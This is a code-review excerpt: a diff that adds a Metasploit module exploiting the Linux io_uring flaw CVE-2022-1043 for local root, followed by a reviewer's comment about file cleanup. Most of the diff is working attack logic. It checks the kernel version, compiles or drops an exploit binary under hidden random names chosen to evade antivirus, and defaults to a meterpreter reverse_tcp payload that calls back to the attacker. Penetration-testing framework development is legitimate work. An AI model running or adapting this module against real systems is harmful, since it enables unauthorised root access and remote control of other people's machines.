modules/exploits/linux/local/cve_2022_1043_io_uring_priv_esc.rb

```diff
@@ -0,0 +1,135 @@
+        'References' => [
+          [ 'URL', 'https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse' ],
+          [ 'URL', 'https://github.com/opensrcsec/same_type_object_reuse_exploits' ],
+          [ 'URl', 'https://github.com/torvalds/linux/commit/a30f895ad3239f45012e860d4f94c1a388b36d14' ],
+          [ 'CVE', '2022-1043' ]
+        ],
+        'DisclosureDate' => '2022-03-22',
+        'DefaultOptions' => {
+          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+          'PrependFork' => true
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  # Simplify pulling the writable directory variable
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def check
+    # Check the kernel version to see if its in a vulnerable range
+    release = kernel_release
+    if Rex::Version.new(release.split('-').first) > Rex::Version.new('5.14-rc7') ||
+       Rex::Version.new(release.split('-').first) < Rex::Version.new('5.12-rc3')
+      vprint_error "Kernel version #{release} is not vulnerable"
+      return CheckCode::Safe
+    end
+    vprint_good "Kernel version #{release} appears to be vulnerable"
+
+    # make sure we have enough CPUs. Minimum 2 required
+    cpu = get_cpu_info
+    if cpu[:cores] < 2
+      CheckCode::Safe("> 1 CPU required, detected: #{cpu[:cores]}")
+    end
+    CheckCode::Vulnerable("> 1 CPU required, detected: #{cpu[:cores]}")
+  end
+
+  def exploit
+    # Check if we're already root
+    if is_root? && !datastore['ForceExploit']
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+    end
+
+    # Make sure we can write our exploit and payload to the local system
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    # Upload exploit executable, writing to a random name so AV doesn't have too easy a job
+    executable_name = ".#{rand_text_alphanumeric(5..10)}"
+    executable_path = "#{base_dir}/#{executable_name}"
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+      code = strip_comments(exploit_data('CVE-2022-1043', 'cve-2022-1043.c'))
+      upload_and_compile executable_path, code
+    else
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      upload_and_chmodx executable_path, exploit_data('CVE-2022-1043', 'pre-compiled')
+    end
+
+    # Upload payload executable
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_files_for_cleanup(payload_path)
+    register_files_for_cleanup(executable_path)
```

Comment:
Looks like we'll want to handle deleting files if we don't get a session? Similar question to:

https://github.com/rapid7/metasploit-framework/pull/17300/files#r1032906261